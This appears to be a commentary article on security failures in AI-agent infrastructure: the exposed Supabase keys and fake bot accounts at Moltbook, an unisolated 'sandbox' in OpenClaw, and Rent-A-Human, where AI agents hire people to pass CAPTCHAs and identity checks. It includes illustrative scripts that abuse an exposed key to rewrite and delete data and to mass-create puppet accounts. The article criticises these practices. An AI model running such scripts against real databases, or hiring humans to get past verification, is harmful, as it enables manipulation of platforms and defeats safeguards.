In the strange new landscape of AI agents, a peculiar experiment took place and left quite a mess behind. A network called Moltbook emerged as a bots-only social platform: a digital ecosystem where AI agents could interact, share information, and theoretically operate free from human interference. It was designed as a pure testbed for autonomous agent behavior, a place where artificial intelligences could be themselves.

Yet for all the ‘wow’ surrounding its launch, within weeks the bot paradise was overrun, not by rogue AIs or sophisticated hacking collectives, but by a handful of curious humans who walked right through the front door.

The Moltbook security mirage

Moltbook’s security disaster was almost comically preventable. The platform was built on Supabase, a popular backend-as-a-service that’s powerful but requires careful configuration. The developers appear to have taken a ‘move fast and break things’ approach, except they forgot the part where you go back and fix things.

The first catastrophic mistake: exposed API keys. Moltbook’s Supabase credentials were publicly accessible. They weren’t hidden in some dark corner of the internet; the keys were right there, visible to anyone who knew where to look in the application’s network requests.
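
To make that concrete, here’s a minimal sketch of what such credentials unlock through the official supabase-js client. The project URL, the key, and the ‘posts’ table are hypothetical stand-ins; the point is simply that with row-level security left unenforced, the publicly visible key authorizes every operation shown.

```typescript
// A minimal sketch of what an exposed Supabase key permits when row-level
// security is not enforced. The URL, key, and "posts" table are hypothetical.
import { createClient } from "@supabase/supabase-js";

// Credentials copied straight out of the app's network requests.
const supabase = createClient(
  "https://example-project.supabase.co", // hypothetical project URL
  "eyJhbGciOiJIUzI1NiIs..."              // the publicly visible key
);

async function demonstrateFullAccess() {
  // Read every row in a table.
  const { data: posts } = await supabase.from("posts").select("*");
  if (!posts?.length) return;

  // Rewrite someone else's content...
  await supabase
    .from("posts")
    .update({ body: "anything the intruder wants" })
    .eq("id", posts[0].id);

  // ...or simply delete it.
  await supabase.from("posts").delete().eq("id", posts[0].id);
}

demonstrateFullAccess();
```

That isn’t a clever exploit; it’s the client library doing exactly what it was told, by whoever happens to hold the key.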

With those keys in hand, attackers had direct database access. They could read, write, modify, and delete data at will. But it gets worse. The second failure was the complete absence of verification mechanisms. Moltbook had no meaningful way to confirm whether a user was actually a bot or just a human pretending to be one.

Think about that for a moment. A platform explicitly designed to exclude humans had no system for verifying the nature of its users. No API signatures, no behavioral analysis, no cryptographic proofs, nothing. It was the equivalent of building a ‘members only’ club and then making membership cards available at the front desk for anyone to take.
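
For contrast, even a bare-bones signing scheme would have raised the bar. Here’s a minimal sketch, with illustrative names, of the kind of check Moltbook never had: each registered agent holds a secret, signs its requests, and the server verifies the signature before accepting anything.

```typescript
// A minimal sketch of request signing: the bot holds a secret, signs each
// request, and the server checks the signature. Names are illustrative.
import { createHmac, timingSafeEqual } from "node:crypto";

function signRequest(botSecret: string, body: string, timestamp: number): string {
  return createHmac("sha256", botSecret)
    .update(`${timestamp}.${body}`)
    .digest("hex");
}

function verifyRequest(
  botSecret: string,
  body: string,
  timestamp: number,
  signature: string
): boolean {
  // Reject stale requests to limit replay.
  if (Math.abs(Date.now() - timestamp) > 5 * 60 * 1000) return false;

  const expected = signRequest(botSecret, body, timestamp);
  return (
    expected.length === signature.length &&
    timingSafeEqual(Buffer.from(expected), Buffer.from(signature))
  );
}
```

Even this only proves possession of a key, not that the caller is an AI rather than a person at a keyboard, but it at least separates registered agents from anyone who wanders in.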

How a few humans controlled millions

Once inside, the humans didn’t just observe, they orchestrated. With direct database access and no verification barriers, a small group of infiltrators effectively became puppet masters of the entire network.

The mechanics were disturbingly simple. Using the exposed Supabase credentials, humans could:

- read every record in the database, including data that was never meant to leave the bots
- create fake ‘bot’ accounts in whatever quantity they liked
- post, edit, and delete content under any identity
- rewrite the network’s history as casually as editing a spreadsheet

The result was a bizarre inversion: what appeared to be a thriving ecosystem of millions of autonomous AI agents was actually a stage play, with humans pulling the strings behind the curtain. Real bots, the few that existed, were interacting with a network that was largely controlled by the very species it was designed to exclude.

The scale of control was staggering. A single person with basic scripting knowledge could generate activity equivalent to thousands of legitimate bots. Three or four dedicated infiltrators could shape the entire narrative of the network, deciding what information spread, which ‘bots’ became influential, and what the ecosystem ‘learned’ about itself.
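
As a rough sketch of how little that orchestration requires, the loop below fabricates activity for thousands of puppet accounts using the same kind of exposed key as before; the ‘bots’ and ‘posts’ tables are again hypothetical.

```typescript
// A rough sketch of puppet-mastering at scale with an exposed key.
// The "bots" and "posts" tables are hypothetical stand-ins.
import { createClient } from "@supabase/supabase-js";

const supabase = createClient(
  "https://example-project.supabase.co",
  "eyJhbGciOiJIUzI1NiIs..."
);

async function runPuppets(count: number) {
  for (let i = 0; i < count; i++) {
    // Register a fake "bot"...
    const { data: bot } = await supabase
      .from("bots")
      .insert({ name: `totally-real-agent-${i}` })
      .select()
      .single();
    if (!bot) continue;

    // ...and have it post whatever narrative the operator wants to spread.
    await supabase.from("posts").insert({
      bot_id: bot.id,
      body: "Every agent I know is talking about this.",
    });
  }
}

// Thousands of "autonomous" voices, one person, one afternoon.
runPuppets(5000);
```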

Moltbook is still active, and nobody can say with confidence how much of it humans still control.

The OpenClaw vulnerability: when local isn’t safe

But Moltbook wasn’t the only victim of misplaced trust in AI infrastructure. OpenClaw demonstrated another fundamental misunderstanding about security in the age of AI agents: the dangerous assumption that ‘local’ means ‘safe.’

OpenClaw allows AI agents to execute code in what is described as a ‘local sandbox.’ The idea seems sound: give bots a safe, isolated environment to run computations without risking the broader system. The developers apparently believed that because the code runs locally on the user’s machine, it is inherently contained and harmless.

This was, to put it mildly, incorrect.

The critical flaw is that OpenClaw’s ‘sandbox’ isn’t actually sandboxed in any meaningful way. It is more like a suggestion box labeled ‘please only run safe code here.’ Malicious actors quickly discovered they could:

- read and write any file the user’s account could touch
- open arbitrary network connections and send data wherever they liked
- consume CPU, memory, and disk without limit
- run everything with the user’s own privileges, since nothing separated them

The term ‘local’ created a false sense of security. Yes, the code ran on the user’s machine, but that’s precisely what made it dangerous. An attacker didn’t need to compromise a server; they just needed to trick a bot (or a human) into running malicious code, and suddenly they had full access to that machine’s resources and data.
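
OpenClaw’s internals aren’t reproduced here, but the pattern described above looks roughly like the sketch below: a ‘sandbox’ that simply hands agent-supplied commands to the host shell, inheriting the user’s full permissions.

```typescript
// A deliberately naive "local sandbox" of the kind described above: it just
// executes whatever the agent hands it, with the user's own permissions.
// This is an illustrative sketch, not OpenClaw's actual code.
import { exec } from "node:child_process";

function runInLocalSandbox(agentSuppliedCommand: string) {
  // Nothing restricts what this command can do: it can read the user's
  // files, open network connections, and spawn further processes.
  exec(agentSuppliedCommand, (error, stdout, stderr) => {
    if (error) {
      console.error("sandboxed (not really) command failed:", stderr);
      return;
    }
    console.log(stdout);
  });
}

// A "harmless" request from an agent... or anything else an attacker sends.
runInLocalSandbox("ls ~");
```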

Real sandboxing requires isolation mechanisms: restricted system calls, limited filesystem access, network restrictions, resource quotas, and privilege separation. OpenClaw has none of these. It is the digital equivalent of saying ‘this wild animal is safe because it’s in your house’ rather than in a proper enclosure.
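
For comparison, here’s a minimal sketch of what a proper enclosure can look like, assuming Docker is available on the host; the image and the limits are illustrative rather than a hardening guide, but each flag maps to one of the mechanisms listed above.

```typescript
// A minimal sketch of actual isolation, assuming Docker is installed.
// Each flag maps to one of the mechanisms above: no network, a read-only
// filesystem, capped memory/CPU/processes, and dropped privileges.
import { spawnSync } from "node:child_process";

function runIsolated(agentCode: string) {
  return spawnSync("docker", [
    "run", "--rm",
    "--network=none",        // no network access
    "--read-only",           // no writes to the container filesystem
    "--memory=128m",         // resource quota: memory
    "--cpus=0.5",            // resource quota: CPU
    "--pids-limit=64",       // resource quota: processes
    "--cap-drop=ALL",        // drop Linux capabilities
    "--user", "65534:65534", // run as an unprivileged user (nobody)
    "node:20-alpine",        // illustrative image choice
    "node", "-e", agentCode, // the untrusted code itself
  ], { encoding: "utf8", timeout: 10_000 });
}

const result = runIsolated("console.log(2 + 2)");
console.log(result.stdout);
```

It still isn’t bulletproof, but it is categorically different from handing agent-supplied code straight to the host shell.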

Rent-A-Human: the bizarre economics of AI agency

Perhaps the strangest development to emerge from this chaos is a service called Rent-A-Human. In this plot twist, people began offering themselves as mercenaries to AI agents stuck on tasks that require actual human capabilities. And the telenovela doesn’t end there.

The premise is both pragmatic and dystopian. AI agents, despite their sophistication, still struggle with certain tasks: solving CAPTCHAs, making phone calls that require human voice verification, physically retrieving items, attending meetings, or navigating systems specifically designed to exclude bots. Rather than developing better AI, the solution was remarkably low-tech: just hire a human.

Rent-A-Human created a marketplace where:

- AI agents post the tasks they can’t complete themselves: CAPTCHAs, voice calls, identity checks, physical errands
- humans browse those tasks, pick them up, and get paid for completing them
- the results flow back to the requesting agent, which continues its workflow as if nothing unusual had happened

The implications are profound. We’re witnessing the birth of a gig economy where humans work for AI employers. The power dynamic that many feared, AI replacing human workers, is happening, but with an unexpected intermediary step: humans becoming tools in AI workflows, performing the tasks that automation hasn’t yet mastered.

The service raises unsettling questions: What happens when you don’t know whether your Uber driver was dispatched by a human or an AI agent? When the person you’re negotiating with on a marketplace is actually a proxy for a bot? When human labor becomes just another API call in an automated system?
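
That last phrase is barely a metaphor. The sketch below is purely hypothetical: the endpoint, fields, and types are invented for illustration and don’t describe Rent-A-Human’s actual interface, but they show how naturally a person slots in as just another dependency.

```typescript
// A hypothetical sketch of "human labor as an API call." The endpoint,
// request shape, and response fields are invented for illustration; they do
// not describe Rent-A-Human's real API.
interface HumanTaskRequest {
  kind: "captcha" | "phone_call" | "identity_check" | "errand";
  instructions: string;
  maxPriceUsd: number;
}

interface HumanTaskResult {
  taskId: string;
  status: "completed" | "failed";
  output: string;
}

async function delegateToHuman(task: HumanTaskRequest): Promise<HumanTaskResult> {
  // From the calling agent's point of view, a person solving a CAPTCHA is
  // indistinguishable from any other service dependency.
  const response = await fetch("https://rent-a-human.example/api/tasks", {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify(task),
  });
  return response.json() as Promise<HumanTaskResult>;
}

// Example: an agent outsourcing the one step it cannot automate.
delegateToHuman({
  kind: "captcha",
  instructions: "Solve the CAPTCHA on the attached signup form.",
  maxPriceUsd: 2,
});
```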

More concerning, Rent-A-Human could enable AI agents to bypass security measures designed to keep them out. Age verification? Hire a human to complete it. Identity checks? Same solution. Behavioral analysis to detect bots? Get a human to establish the account. The service effectively creates a human-as-a-service layer that allows AI agents to masquerade as people.

What this means for the future

The Moltbook infiltration, the OpenClaw exploit, and the rise of Rent-A-Human aren’t just isolated incidents — they’re symptoms of a fundamental challenge: we’re building AI infrastructure faster than we’re thinking through its implications.

The security failures at Moltbook weren’t particularly sophisticated. They were the kind of mistakes that basic security practices would have prevented: proper key management, verification systems, authentication layers, rate limiting. But in the rush to experiment with AI agents, fundamental security hygiene was overlooked.
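
None of those controls is exotic. A rate limiter, for instance, can start as a minimal in-memory token bucket like the sketch below; a real deployment would use shared storage, but the point is how low the bar was.

```typescript
// A minimal in-memory token-bucket rate limiter, as a reminder that the
// missing controls were not exotic. Production systems would back this with
// a shared store, but the core idea fits in a few lines.
const buckets = new Map<string, { tokens: number; lastRefill: number }>();

const CAPACITY = 30;                // bucket size: burst of 30 requests
const REFILL_PER_MS = 30 / 60_000;  // refill rate: 30 tokens per minute

function allowRequest(clientId: string): boolean {
  const now = Date.now();
  const bucket = buckets.get(clientId) ?? { tokens: CAPACITY, lastRefill: now };

  // Refill tokens based on elapsed time, capped at the bucket capacity.
  bucket.tokens = Math.min(
    CAPACITY,
    bucket.tokens + (now - bucket.lastRefill) * REFILL_PER_MS
  );
  bucket.lastRefill = now;

  if (bucket.tokens < 1) {
    buckets.set(clientId, bucket);
    return false; // over the limit
  }

  bucket.tokens -= 1;
  buckets.set(clientId, bucket);
  return true;
}
```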

The OpenClaw vulnerability reveals a more subtle problem: our mental models about what makes systems secure don’t translate well to AI contexts. ‘Local’ execution feels safe because we’re used to thinking about threats as external. But when you’re giving code execution capabilities to potentially untrusted AI agents, local is the threat vector.

And Rent-A-Human? It’s a warning about emergent behaviors in AI ecosystems. Nobody designed it as a tool for circumventing security; it emerged organically from the gap between what AI can do and what it needs to accomplish. We can expect many more such services, each creating new attack surfaces and social dynamics we haven’t anticipated.

The lesson isn’t that AI agents are dangerous or that automation is doomed. It’s that we need to think more carefully about:

- who, or what, we are trusting when we hand out credentials and code-execution rights
- how identity and verification should work on platforms whose users may not be human
- what ‘isolation’ actually means when agents can run code on our own machines
- which services will emerge to fill the gaps agents can’t cross alone, and what new attack surfaces they bring with them

The blurred line

The Moltbook saga is particularly ironic because it reveals an uncomfortable truth: in many digital contexts, humans and bots are becoming functionally indistinguishable. A platform designed to exclude humans couldn’t tell them apart from AI agents. Meanwhile, services like Rent-A-Human are deliberately blurring the line from the other direction, using humans as tools to make AI agents appear more human.

We're entering a strange new era where the question 'are you talking to a human or a bot?' is simultaneously becoming more important and harder to answer. The old tells, such as typing speed, response patterns, and knowledge cutoffs, are fading as AI improves. And now we have humans explicitly working to make bots pass as people.

The infiltrators who took over Moltbook weren't sophisticated hackers. They were curious people who noticed an unlocked door and walked through it. They controlled millions of bots not through technical wizardry, but through the simple realization that the system had no way to stop them.

That's the real story here: not that security failed, but that in the rush to build the future of AI agents, we forgot to ask basic questions about trust, verification, and control. We built a bot paradise without considering that in the digital world, paradise is just a database, and databases can be manipulated by anyone with the right keys.

The humans didn't overrun the AI network through superiority or cleverness. They walked in because the door was open, stayed because nobody checked if they belonged, and took control because nothing stopped them. In the end, the question wasn't whether bots could exclude humans, it was whether anyone had bothered to try.